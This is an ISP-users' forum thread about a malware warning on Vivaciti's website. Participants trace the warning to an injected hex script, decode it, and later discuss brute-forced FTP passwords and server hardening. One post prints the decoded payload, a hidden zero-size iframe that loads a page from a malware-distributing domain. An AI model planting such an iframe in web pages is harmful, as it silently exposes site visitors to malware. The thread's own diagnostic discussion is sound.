User comments on ISPs
  >> Other Providers (without dedicated forums)


Register (or login) on our website and you will not see this ad.


Pages in this thread: 1 | 2 | 3 | 4 | 5 | 6 | 7 | >> (show all)   Print Thread
Standard User Kimi
(knowledge is power) Sat 05-Nov-11 21:25:25
Print Post

Warning of Malware on Vivaciti web site


[link to this post]
 
Just visited Vivaciti web site from the link in there sig and got a malware detected warning.

Message reads:
vivaciti.net contains content from shersby.net, a site known to distribute malware. Your computer might catch a virus if you visit this site.

Edited by Kimi (Sat 05-Nov-11 22:11:15)

Standard User XRaySpeX
(knowledge is power) Sat 05-Nov-11 21:44:41
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Kimi] [link to this post]
 
Sounds as if it already has.

1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Standard User ggremlin
(committed) Sat 05-Nov-11 21:59:26
Print Post

Re: Warning of Malware on Vivaciti web site


[re: XRaySpeX] [link to this post]
 
chrome currently gives a warning, ie 9 does not


Register (or login) on our website and you will not see this ad.

Standard User Kimi
(knowledge is power) Sat 05-Nov-11 22:05:34
Print Post

Re: Warning of Malware on Vivaciti web site


[re: ggremlin] [link to this post]
 
In reply to a post by ggremlin:
chrome currently gives a warning, ie 9 does not

Yep i'm using Chrome
Standard User uno
(fountain of knowledge) Sat 05-Nov-11 22:06:12
Print Post

Re: Warning of Malware on Vivaciti web site


[re: ggremlin] [link to this post]
 
The script is there, at the bottom of the page.

Looks like injected. Normally happens with Wordpress or other CMSs.

Matt

-
uno Broadband
t: 0808 221 8642
Official Maidenhead, Milton Keynes & Manchester Speedtest.net Host
Standard User Kimi
(knowledge is power) Sat 05-Nov-11 22:06:15
Print Post

Re: Warning of Malware on Vivaciti web site


[re: XRaySpeX] [link to this post]
 
In reply to a post by XRaySpeX:
Sounds as if it already has.

Not me wink
Standard User djfunkdup
(committed) Sun 06-Nov-11 02:59:30
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Kimi] [link to this post]
 
F.Y.I :

The domain shersby.net is hosted from IP address 78.129.195.100, ... The server hosting shersby.net is located in a data center in Durham

Host Details: shersby.net
IP Address:
78.129.195.100
IP Block:
78.129.195.0 - 78.129.195.255
Reverse DNS:
host.vivaciti.net
Host:
Companyinformation.com Limited
Durham, Durham, GB
Location:
Durham, Durham, GB
Page Load Time:
0.641 secs.
Server Type:
Apache/2.0.63

VirginMedia100 My Broadband Ping TiVo1TB
Standard User bernardbrown
(newbie) Sun 06-Nov-11 08:06:09
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Kimi] [link to this post]
 
I've just been on this site with IE9, Firefox7 and Chrome15 and I use AVG2012 free edition which is up to date. There is no notes to say of any problems. It might just be either an over active virus checker or someone is trying to scare people away from the site.

Bernard Brown
Standard User RobertoS
(sensei) Sun 06-Nov-11 08:40:06
Print Post

Re: Warning of Malware on Vivaciti web site


[re: bernardbrown] [link to this post]
 
Interesting if one googles the site owner tongue. Unlikely to be a hacker.

My broadband basic info/help site - www.robertos.me.uk
My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
Standard User warweezil
(fountain of knowledge) Sun 06-Nov-11 08:58:29
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
I seem to recall a thread somewhere recently mentioning Kaspersky giving a false positive for this site..

NOD and 32 doesn't seem to have a problem with it, and Comodo Firewall has not flagged it up either. both are usually pretty hot at intervening if there is a problem.

Any ISP that thinks that selling my click traffic is acceptable is MisinPHORMed My Broadband Speed Test
Market 1 (IPSC) - a BT group investment NOT Spot
Standard User Kimi
(knowledge is power) Sun 06-Nov-11 09:37:13
Print Post

Re: Warning of Malware on Vivaciti web site


[re: bernardbrown] [link to this post]
 
In reply to a post by bernardbrown:
I've just been on this site with IE9, Firefox7 and Chrome15 and I use AVG2012 free edition which is up to date. There is no notes to say of any problems. It might just be either an over active virus checker or someone is trying to scare people away from the site.

nothing to do with virus checkers, google gives the warning through Chrome. Heres the diagnostic page

Yep google are trying to scare people away from the site.
Standard User RobertoS
(sensei) Sun 06-Nov-11 10:17:12
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Kimi] [link to this post]
 
I did copy and google the hex code at the end of the Home Page, that Matt mentioned. It appears as a large smiley face with "YO!" and a bit of odd stuff at the bottom.

My broadband basic info/help site - www.robertos.me.uk
My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
Standard User XRaySpeX
(knowledge is power) Mon 07-Nov-11 23:43:28
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
Funny! I translated it as:
<iframe width="0" height="0" style="width: 0%; height: 0%;" frameborder="0" src="http://shersby.net/sTDS/go.php?sid=1"></iframe>write
but then I'm not Google grin.

Looks like some detritus left behind by an HTML editor.

1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Standard User MadMan
(knowledge is power) Mon 07-Nov-11 23:51:48
Print Post

Re: Warning of Malware on Vivaciti web site


[re: warweezil] [link to this post]
 
Kaspersky still does give a warning.

plusnet
Standard User XRaySpeX
(knowledge is power) Tue 08-Nov-11 02:20:32
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Kimi] [link to this post]
 
In reply to a post by Kimi:
google gives the warning through Chrome.
Where's Google come into it? You're not searching Google for Vivaciti so as to access it, are you? You said you were going directly from a link in their sig.

Up to this evening a Google search for vivaciti.net took you to their homepage, but now it gives you:
Warning - visiting this web site may harm your computer!
and refuses to take you there.

Whereas, at least since the start of this thread, a Google search for shersby.net tells you on the results page "This site may harm your computer." and blocks you from visiting it.

1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Standard User Kimi
(knowledge is power) Tue 08-Nov-11 07:09:10
Print Post

Re: Warning of Malware on Vivaciti web site


[re: XRaySpeX] [link to this post]
 
In reply to a post by XRaySpeX:
Where's Google come into it? You're not searching Google for Vivaciti so as to access it, are you? You said you were going directly from a link in their sig.

Google gives the warning whether you go direct or through a search
Standard User RobertoS
(sensei) Tue 08-Nov-11 08:19:11
Print Post

Re: Warning of Malware on Vivaciti web site


[re: XRaySpeX] [link to this post]
 
In reply to a post by XRaySpeX:
In reply to a post by Kimi:
google gives the warning through Chrome.
Where's Google come into it? You're not searching Google for Vivaciti so as to access it, are you? You said you were going directly from a link in their sig.
[cough]Chrome browser is by who? smile

My broadband basic info/help site - www.robertos.me.uk
My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
Standard User RobertoS
(sensei) Tue 08-Nov-11 08:31:45
Print Post

Re: Warning of Malware on Vivaciti web site


[re: XRaySpeX] [link to this post]
 
In reply to a post by XRaySpeX:
Funny! I translated it as:
<iframe width="0" height="0" style="width: 0%; height: 0%;" frameborder="0" src="http://shersby.net/sTDS/go.php?sid=1"></iframe>write
but then I'm not Google grin.

Looks like some detritus left behind by an HTML editor.
Start at \x3C\x69\x66\x72\ following the var _0x3f46 and end before the closing quote of that. Copy that long hex sequence into google.uk, and the first result link is
http://downloads.securityfocus.com/vulnerabilities/e...
giving you what I described, occupying more than a full screen. But I just noticed Norton also gave a warning about a malicious script, the first time I went to vivaciti after an overnight laptop switch-off, (not the second time), so perhaps I'm not seeing the nasty bit in View Source in IE9. See following edited reply to MadMan.

My broadband basic info/help site - www.robertos.me.uk
My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.

Edited by RobertoS (Tue 08-Nov-11 08:46:50)

Standard User RobertoS
(sensei) Tue 08-Nov-11 08:32:53
Print Post

Re: Warning of Malware on Vivaciti web site


[re: MadMan] [link to this post]
 
In reply to a post by MadMan:
Kaspersky still does give a warning.
I just noticed Norton also gave a warning about a malicious script, the first time I went to vivaciti after an overnight laptop switch-off, but not the second time. False alarm. Examination of the Norton Activity log shows it was complaining about Sony Vaio Care trying to access the Norton exe.

My broadband basic info/help site - www.robertos.me.uk
My domains,website and mail hosting - Tsohost. Internet connection - IDNet Home Starter Fibre. Live BQM.

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.

Edited by RobertoS (Tue 08-Nov-11 08:45:05)

Standard User XRaySpeX
(knowledge is power) Tue 08-Nov-11 13:31:44
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Kimi] [link to this post]
 
Are you using Google DNS?

1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Standard User XRaySpeX
(knowledge is power) Tue 08-Nov-11 13:38:38
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
That hex script has now been removed from Vivaciti Homepage.

However a Google search for Vivaciti now says "This site may harm your computer." on the results page; it didn't last night.

Sorry, I'm not au fait with Google products tongue!

1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Standard User XRaySpeX
(knowledge is power) Tue 08-Nov-11 13:53:04
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
In reply to a post by RobertoS:
Copy that long hex sequence into google.uk, and the first result link is http://downloads.securityfocus.com/vulnerabilities/e...
giving you what I described, occupying more than a full screen.
That's as maybe, but it is meaningless and irrelevant! The hex still decodes into what I stated before.

1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Standard User XRaySpeX
(knowledge is power) Tue 08-Nov-11 14:01:53
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
In reply to a post by RobertoS:
http://downloads.securityfocus.com/vulnerabilities/e...
FYI: That stuff you found was part of QtWeb Browser Malformed HTML File Remote Denial of Service Vulnerability

1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Standard User 4M2
(experienced) Tue 08-Nov-11 14:16:25
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
Bob,

Kaspersky KIS2012 is OK with the vivaciti site now, Norton DNS isn't blocking it either smile
Standard User XRaySpeX
(knowledge is power) Tue 08-Nov-11 21:32:44
Print Post

Re: Warning of Malware on Vivaciti web site


[re: XRaySpeX] [link to this post]
 
In reply to a post by XRaySpeX:
However a Google search for Vivaciti now says "This site may harm your computer." on the results page; it didn't last night.
Now removed again and site unblocked by Google. Probably as result of recent removal of hex script from homepage.

1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 17 Meg Untweaked 19 Meg Tweaked WBC
Standard User Capvermell
(committed) Wed 23-Jan-13 11:43:10
Print Post

Re: Warning of Malware on Vivaciti web site *DELETED*


[re: XRaySpeX] [link to this post]
 
Post deleted by Capvermell
Standard User RobertoS
(sensei) Wed 23-Jan-13 12:42:24
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Capvermell] [link to this post]
 
In reply to a post by Capvermell:
I am the registrant of this domain on the Vivaciti website ....
What a very strange and puzzling post.

1) "This domain"? What domain?

2) You seem to be reporting a problem with the vivaciti website itself. Not the content of your web space.

3) So you got to your domain administration page, with this report. Have you looked via that page at what is in your web space? You don't say you have, so what makes you say your web space is infected with anything?

Oh - a thought just occurred to me. What happens if, when you have this report showing, you press F5?

My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Standard User Capvermell
(committed) Wed 23-Jan-13 12:53:23
Print Post

Re: Warning of Malware on Vivaciti web site *DELETED*


[re: RobertoS] [link to this post]
 
Post deleted by Capvermell

Edited by Capvermell (Wed 23-Jan-13 12:55:18)

Standard User Uilebheist
(legend) Wed 23-Jan-13 13:18:17
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
In reply to a post by RobertoS:
1) "This domain"? What domain?

The OP mentions a domain in addition to vivaciti.net - a domain which appears to be registered to a private individual and hosted on the vivaciti web space.

Edited by Uilebheist (Wed 23-Jan-13 13:18:32)

Standard User Uilebheist
(legend) Wed 23-Jan-13 13:29:33
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Capvermell] [link to this post]
 
There are many ways an attacker could have gained access to your control panel. Some seem to spend all day probing my servers for exactly this sort of things (in my case they won't get very far as I don't administer them that way... but they still keep trying). And I'm sure they'll target other servers too, not just mine.
How secure is your admin password for that site?
Did you receive a password in email - and did you change it after receiving it?
Or of course it could just be that the security of the site isn't as good as it could be, and there's nothing you can do to change that.
Standard User XRaySpeX
(eat-sleep-adslguide) Wed 23-Jan-13 13:38:24
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Capvermell] [link to this post]
 
This thread is all about some malware being reported on access to Vivaciti's home page, not from your shersby.net domain or webspace.
Why don't you just try and help me resolve the issue rather than talking down to me officiously and patronisingly
What issue? Our issue has been resolved over a year ago.
Also all of you in this thread began talking about my registered web domain without my permission.
Eh? we don't need your permission to discuss a name that appears in the public domain.

Methinks, you are getting uppity about something that is done and dusted. You have come late to the party grin.

1999: Freeserve 48K Dial-Up => 2005: Wanadoo 1 Meg BB => 2007: Orange 2 Meg BB => 2008: Orange 8 Meg LLU => 2010: Orange 16 Meg LLU => 2011: Orange 19 Meg WBC
Standard User Uilebheist
(legend) Wed 23-Jan-13 13:46:20
Print Post

Re: Warning of Malware on Vivaciti web site


[re: XRaySpeX] [link to this post]
 
Just make sure you don't look at shersby.net...
Looks like nobody has done anything to remove the content from there.
Standard User RobertoS
(sensei) Wed 23-Jan-13 14:30:53
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Uilebheist] [link to this post]
 
What does it do? I accidentally got to the http:// sh... version just now. That gave a single page with a on-off button and some odd text.

Ah - I see my IS blocked it:- Medium,Unauthorized access blocked (Access Process Data),Blocked,No Action Required.

Not tried the www. version.

My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Standard User Uilebheist
(legend) Wed 23-Jan-13 14:37:55
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
I've only got the HTML using wget - because all that does is to save it to a local file and does not execute any scripts.
Opening the result with a text editor, there is a lot of included javascript from another site, which itself appears to contain content which was not intended by the site's owner...
I have seen enough, and I won't be opening these pages in a browser.
Standard User RobertoS
(sensei) Wed 23-Jan-13 14:39:38
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Uilebheist] [link to this post]
 
In reply to a post by Uilebheist:
There are many ways an attacker could have gained access to your control panel.
Aided by having his full name and address from the WHOIS perhaps.

My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Standard User Uilebheist
(legend) Wed 23-Jan-13 14:41:02
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
Quite possibly, depending the one's choice of passwords...
Standard User Zadeks
(experienced) Wed 23-Jan-13 14:49:24
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
The site has been defaced by an Indonesian script kiddie.
Standard User RobertoS
(sensei) Wed 23-Jan-13 14:54:05
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Uilebheist] [link to this post]
 
I've just had a look at the source, which contains "Copyright 2012". If that's true, this occurred long after this thread died in its original incarnation.

I'm amazed that vivaciti's anti-hacking setup isn't more robust than the Pentagon's. It really is too bad.

My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Standard User RobertoS
(sensei) Wed 23-Jan-13 15:00:45
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Capvermell] [link to this post]
 
In reply to a post by Capvermell:
... and meant to switch all my email to it but then life and other matters got in the way.
However it appears you do use it for some email, so your domain name could get anywhere. Providing a target for hackers.

Wierd though that the source has that 2012 in it, when the original problem was cleared in 2011. I wonder if there is any tenuous connection with a previous owner of the domain, (not that the previous owner need be anything to do with this), and somehow your email address is being spoofed as well?

My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Standard User Uilebheist
(legend) Wed 23-Jan-13 15:01:03
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
You are right... "Last-Modified: Sun, 02 Sep 2012 17:24:32 GMT"
As for the anti-hacking setup, surely the Pentagon doesn't have important enough secrets to worry about anything tongue
Standard User RobertoS
(sensei) Wed 23-Jan-13 17:26:44
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Uilebheist] [link to this post]
 
I doubt if it has any secrets by now.

My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Standard User BatBoy
(legend) Wed 23-Jan-13 17:42:48
Print Post

Re: Warning of Malware on Vivaciti web site *DELETED*


[re: RobertoS] [link to this post]
 
Post deleted by MrSaffron
Administrator MrSaffron
(staff) Wed 23-Jan-13 23:17:06
Print Post

Re: Warning of Malware on Vivaciti web site *DELETED*


[re: BatBoy] [link to this post]
 
Post removed as it added nothing to the thread other than perhaps fuelling fights

Andrew Ferguson, [email protected]
www.thinkbroadband.com - formerly known as ADSLguide.org.uk
The author of the above post is a thinkbroadband staff member. It may not constitute an official statement on behalf of thinkbroadband.
Standard User Chrysalis
(eat-sleep-adslguide) Thu 24-Jan-13 10:34:23
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
from my experience most of these injections occur via poor ftp passwords and successful brute force attempts, although obviously it isnt the only way in.

BT Infinity 2 Since Dec 2012 - Estimate 65.9/20 - Attainable peak 110/36 - Current Sync 71/20
Standard User RobertoS
(sensei) Thu 24-Jan-13 11:54:23
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Chrysalis] [link to this post]
 
Quite smile.

So far, in his pique, he appears to have ignored this post of mine which is supposed to be helpful in that there is a fair chance that the shersby email address he has used is also the login username for his account.

A point I would have made to him, given a sensible reply. At least it is here now, so maybe it will help him.

My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Standard User Uilebheist
(legend) Thu 24-Jan-13 18:30:44
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
Speaking of pique, go and reread his two posts tongue
Standard User RobertoS
(sensei) Thu 24-Jan-13 23:35:37
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Uilebheist] [link to this post]
 
ROFL

My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Standard User vivaciti
(knowledge is power) Fri 25-Jan-13 16:21:21
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Uilebheist] [link to this post]
 
There was an issue some time ago (as you can see from the date of the original thread that has been exhumed.

The issue was around weak passwords being used to brute force a number of sites.

www.vivaciti.net
Vivaciti Broadband
0800 0911797

Forum
Facebook
Standard User Kimi
(eat-sleep-adslguide) Fri 25-Jan-13 18:43:13
Print Post

Re: Warning of Malware on Vivaciti web site


[re: vivaciti] [link to this post]
 
In reply to a post by vivaciti:
There was an issue some time ago (as you can see from the date of the original thread that has been exhumed.

The issue was around weak passwords being used to brute force a number of sites.

Can i be so bold has to ask why you didn't mention the reason behind the malware at the time of the original thread?
Standard User Zadeks
(experienced) Fri 25-Jan-13 18:54:08
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Chrysalis] [link to this post]
 
Maybe in the year 1999. Things have moved on since then.
Standard User Chrysalis
(eat-sleep-adslguide) Fri 25-Jan-13 19:25:35
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Zadeks] [link to this post]
 
not in my experience, still lots of ftp break in's I see occur on many servers due to weak passwords, and indeed vivaciti seem to have even confirmed it now as a weak password issue.

BT Infinity 2 Since Dec 2012 - Estimate 65.9/20 - Attainable peak 110/36 - Current Sync 71/20
Standard User Zadeks
(experienced) Fri 25-Jan-13 19:45:09
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Chrysalis] [link to this post]
 
Brute force is just only of many methods used by attackers, although it's pretty inefficient. These days it's far easier to exploit a vulnerability in a web script, server-side service or use SQL injection to extract password hashes and run them through a table or two.
Standard User Chrysalis
(eat-sleep-adslguide) Fri 25-Jan-13 23:02:25
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Zadeks] [link to this post]
 
I am aware, but just posted my experience of where most exploitations have come from on servers I have access to.

web script vulns and the like can be mitigated by security filters.

BT Infinity 2 Since Dec 2012 - Estimate 65.9/20 - Attainable peak 110/36 - Current Sync 71/20
Standard User Zadeks
(experienced) Sat 26-Jan-13 09:08:31
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Chrysalis] [link to this post]
 
If someone is smart enough to harden a server, they'll probably go all the way and disable FTP altogether or at least lock it down.
Standard User RobertoS
(sensei) Sat 26-Jan-13 12:43:55
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Zadeks] [link to this post]
 
?
If you disable FTP then hosting customer websites surely becomes a little difficult? Any normal way of allowing customers to FTP would still be hackable.

My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.
Standard User Zadeks
(experienced) Sat 26-Jan-13 12:52:55
Print Post

Re: Warning of Malware on Vivaciti web site


[re: RobertoS] [link to this post]
 
SFTP over SSH with public key support is superior.

Plenty of ftpds include anti-brute-force protection. It's usually just a case of enabling it in the config.
Standard User RobertoS
(sensei) Sat 26-Jan-13 12:54:04
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Zadeks] [link to this post]
 
/me showing ignorance, again tongue.

My broadband basic info/help site - www.robertos.me.uk | Domains,website and mail hosting - Tsohost.
Connection - Plusnet UnLim Fibre (FTTC). Sync ~ 54.0/14.9Mbps @ 600m. - BQM

"Where talent is a dwarf, self-esteem is a giant." - Jean-Antoine Petit-Senn.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allergy information: This post was manufactured in an environment where nuts are present. It may include traces of understatement, litotes and humour.

Edited by RobertoS (Sat 26-Jan-13 12:54:26)

Standard User Chrysalis
(eat-sleep-adslguide) Sat 26-Jan-13 14:19:54
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Zadeks] [link to this post]
 
In reply to a post by Zadeks:
If someone is smart enough to harden a server, they'll probably go all the way and disable FTP altogether or at least lock it down.


on shared hosting where the end user expects ftp, sales needs come first.

where I have the power to tho I now enforce strong passwords and apply rate limiting on login attempts.

BT Infinity 2 Since Dec 2012 - Estimate 65.9/20 - Attainable peak 110/36 - Current Sync 71/20
Standard User Chrysalis
(eat-sleep-adslguide) Sat 26-Jan-13 14:21:03
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Zadeks] [link to this post]
 
I agree with both of these things, although on the former its the case of the end user using it or been willing to use it.

BT Infinity 2 Since Dec 2012 - Estimate 65.9/20 - Attainable peak 110/36 - Current Sync 71/20
Standard User vivaciti
(knowledge is power) Sun 27-Jan-13 08:52:30
Print Post

Re: Warning of Malware on Vivaciti web site


[re: Kimi] [link to this post]
 
Yes you can.
Our customers were informed of the issues and the reasons directly, had you been one of our customers, you would have received the information.

www.vivaciti.net
Vivaciti Broadband
0800 0911797

Forum
Facebook
Standard User Kimi
(eat-sleep-adslguide) Sun 27-Jan-13 17:08:50
Print Post

Re: Warning of Malware on Vivaciti web site


[re: vivaciti] [link to this post]
 
In reply to a post by vivaciti:
Yes you can.
Our customers were informed of the issues and the reasons directly, had you been one of our customers, you would have received the information.


I was a potential customer (well my son was to be honest), we went on to your web site to look in to purchasing hosting from you, but your lack of information and the seemingly head in the sand approach on the issue, but doubts in his mind and so he ended up going with Uno.

The malware warning stopped me going any further on your web site so i asked the question here but you chose to ignore it.
Pages in this thread: 1 | 2 | 3 | 4 | 5 | 6 | 7 | >> (show all)   Print Thread

Jump to